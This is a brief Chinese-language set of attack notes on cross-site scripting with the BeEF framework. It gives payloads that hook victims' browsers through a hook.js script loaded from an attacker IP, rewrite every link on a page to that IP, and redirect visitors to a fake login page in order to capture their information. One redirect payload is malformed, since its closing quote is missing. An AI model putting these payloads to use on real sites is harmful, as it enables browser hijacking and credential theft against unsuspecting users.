xss与beef
启动beef和apache
修改主页,在网页中添加
<script src='http://IP:3000/hook.js'></script>
xss漏洞利用
篡改网页a标签中的连接
<script> window.onload = function(){ var link = document.getElementsByTagName("a"); for(j = 0; j < link.length; j++){ link[j].href = "http://IP";} } </script>
跳转到目标网页
<script>window.location='http://ip</script>
目标登录网页获取信息